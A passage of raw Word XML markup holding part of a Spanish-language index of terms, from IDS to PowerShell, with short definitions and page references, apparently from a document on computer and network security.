        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Intrusion Detection System, sistema que monitoriza redes o sistemas para detectar actividades maliciosas.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398A0794" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Integridad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F51868A" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>En informática, se refiere a la precisión y consistencia de los datos a lo largo de su ciclo de vida.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 1, 2, 3, 9, 13, 17, 25, 28, 29, 57, 58, 68, 72</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A34ACD" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Internet Engineering Task Force (IETF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14797F41" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Organización que desarrolla y promueve estándares voluntarios para Internet.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14139FEE" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>IP (Internet Protocol)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEB3398" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 8, 11, 19, 54, 55, 56, 60, 65, 66, 69, 70, 71, 74, 75, 76</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2728A9" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>IPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324F9816" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Intrusion Prevention System, sistema diseñado para detectar y prevenir ataques a la red.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328A62C7" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>ISO (International Organization for Standardization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FC3D85" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Organización que desarrolla y publica estándares internacionales.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · i, 4, 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D0C6E5" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>ISO/IEC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186B2626" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Serie de estándares elaborados conjuntamente por ISO y la Comisión Electrotécnica Internacional (IEC).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A339F3" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="Ttulodendice"/>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>J</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF2F751" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D06C8AC" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Lenguaje de programación interpretado, comúnmente utilizado en desarrollo web.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 63, 76</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084D5E0E" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="Ttulodendice"/>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1E0466" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Kernel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699B7134" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Componente central de un sistema operativo, que gestiona las operaciones del sistema y del hardware.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · iv, 30, 31, 32, 33, 34, 35, 37, 38, 39, 40, 41, 42, 43, 79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B52C1EB" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="Ttulodendice"/>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E608AD" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>LaTeX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E78016" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Sistema de composición de textos, ampliamente utilizado para la producción de documentos científicos y matemáticos.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 14, 79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3329780D" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>LMhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EF6892" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Archivo en sistemas Windows utilizado para mapear nombres de red a direcciones IP.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 19</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738B8310" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Loopback</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2FF30D" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Dirección IP utilizada para probar la red interna de un dispositivo.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8C057A" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="Ttulodendice"/>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12BAE54D" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>MAC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FB757E" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Media Access Control, dirección única asignada a la interfaz de red de un dispositivo.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 19, 54, 55, 73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D7374C" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>MAC lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36710DE4" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Proceso de identificación del fabricante de un dispositivo a través de su dirección MAC.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 55</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2EAEE8" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Man in the middle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BF8D445" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Tipo de ataque donde un atacante intercepta la comunicación entre dos partes sin que ellas lo sepan.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 67</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F43AAC" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7BCFFE" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Sistema de gestión de bases de datos relacional de código abierto.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · v, 44, 45, 46, 47, 48, 49, 62, 63, 70, 75, 76</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E738AF" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="Ttulodendice"/>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7683B0" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>NIST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A6E947" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Instituto Nacional de Estándares y Tecnología, agencia del Departamento de Comercio de EE.UU. que desarrolla estándares tecnológicos.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 23</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235029AD" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555BA65E" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>En programación, se refiere a un valor o puntero que no apunta a ningún objeto o dirección.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 65</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380A39CB" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="Ttulodendice"/>
        <w:keepNext/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B57EBD2" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Phreakers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76FED7A3" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Hackers que manipulan sistemas telefónicos.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 19, 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A38E43" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>PowerShell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02957889" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice2"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00800818">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:noProof/>
        </w:rPr>
        <w:t>Lenguaje de scripting y shell de línea de comandos desarrollado por Microsoft.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> · 79</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3DCB3B" w14:textId="77777777" w:rsidR="00D16863" w:rsidRDefault="00D16863">
      <w:pPr>
        <w:pStyle w:val="ndice1"/>
        <w:tabs>
          <w:tab w:val="right" w:pos="8495"/>
        </w:tabs>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
